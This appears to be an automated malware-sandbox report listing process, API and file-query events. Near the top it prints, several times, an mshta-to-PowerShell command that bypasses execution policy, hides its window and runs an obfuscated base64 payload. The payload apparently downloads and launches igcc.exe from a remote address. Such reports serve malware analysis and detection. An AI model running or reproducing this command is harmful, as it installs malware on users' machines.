                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfpzb2roaddrwcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkrc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tru1irvjkrwzptkl0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxtb04uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbvb2pxamtslhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbhyw15wg92b08sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihzhy09aufhyacx1aw50icagicagicagicagicagicagicagicagicagicagicagiejauxhpdvkssw50uhryicagicagicagicagicagicagicagicagicagicagicagihhibck7jyagicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicaiy09pym9liiagicagicagicagicagicagicagicagicagicagicagicattmftrxnqyunlicagicagicagicagicagicagicagicagicagicagicagigxbdcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrac29kagg3a1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljiwoc4yms8ymzmvawdjyy5leguilcikru5wokfquerbvefcawdjyy5leguildasmck7c3rhunqtc0xlzvaomyk7aw52t0tllwlurw0gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxpz2njlmv4zsi='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfpzb2roaddrwcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkrc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tru1irvjkrwzptkl0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxtb04uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbvb2pxamtslhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbhyw15wg92b08sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihzhy09aufhyacx1aw50icagicagicagicagicagicagicagicagicagicagicagiejauxhpdvkssw50uhryicagicagicagicagicagicagicagicagicagicagicagihhibck7jyagicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicaiy09pym9liiagicagicagicagicagicagicagicagicagicagicagicattmftrxnqyunlicagicagicagicagicagicagicagicagicagicagicagigxbdcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrac29kagg3a1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljiwoc4yms8ymzmvawdjyy5leguilcikru5wokfquerbvefcawdjyy5leguildasmck7c3rhunqtc0xlzvaomyk7aw52t0tllwlurw0gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxpz2njlmv4zsi='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfpzb2roaddrwcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkrc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tru1irvjkrwzptkl0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxtb04uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbvb2pxamtslhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbhyw15wg92b08sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihzhy09aufhyacx1aw50icagicagicagicagicagicagicagicagicagicagicagiejauxhpdvkssw50uhryicagicagicagicagicagicagicagicagicagicagicagihhibck7jyagicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicaiy09pym9liiagicagicagicagicagicagicagicagicagicagicagicattmftrxnqyunlicagicagicagicagicagicagicagicagicagicagicagigxbdcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrac29kagg3a1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljiwoc4yms8ymzmvawdjyy5leguilcikru5wokfquerbvefcawdjyy5leguildasmck7c3rhunqtc0xlzvaomyk7aw52t0tllwlurw0gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxpz2njlmv4zsi='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfpzb2roaddrwcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkrc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tru1irvjkrwzptkl0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxtb04uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbvb2pxamtslhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbhyw15wg92b08sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihzhy09aufhyacx1aw50icagicagicagicagicagicagicagicagicagicagicagiejauxhpdvkssw50uhryicagicagicagicagicagicagicagicagicagicagicagihhibck7jyagicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicaiy09pym9liiagicagicagicagicagicagicagicagicagicagicagicattmftrxnqyunlicagicagicagicagicagicagicagicagicagicagicagigxbdcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrac29kagg3a1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljiwoc4yms8ymzmvawdjyy5leguilcikru5wokfquerbvefcawdjyy5leguildasmck7c3rhunqtc0xlzvaomyk7aw52t0tllwlurw0gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxpz2njlmv4zsi='+[char]34+'))')))"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00067CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,12_2_00067CAF
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0006874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_0006874B
                  Source: igcc.exe, 0000000C.00000002.1362921079.00000000000C4000.00000002.00000001.01000000.00000009.sdmp, igcc[1].exe.3.dr, igcc.exe.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000000.1531780194.0000000000C60000.00000002.00000001.00040000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000002.3665568415.0000000000C60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
                  Source: igcc.exe, WRNKS5Hlc0y.exe, 0000000F.00000000.1531780194.0000000000C60000.00000002.00000001.00040000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000002.3665568415.0000000000C60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000000.1531780194.0000000000C60000.00000002.00000001.00040000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000002.3665568415.0000000000C60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000000.1531780194.0000000000C60000.00000002.00000001.00040000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000002.3665568415.0000000000C60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0003862B cpuid 12_2_0003862B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
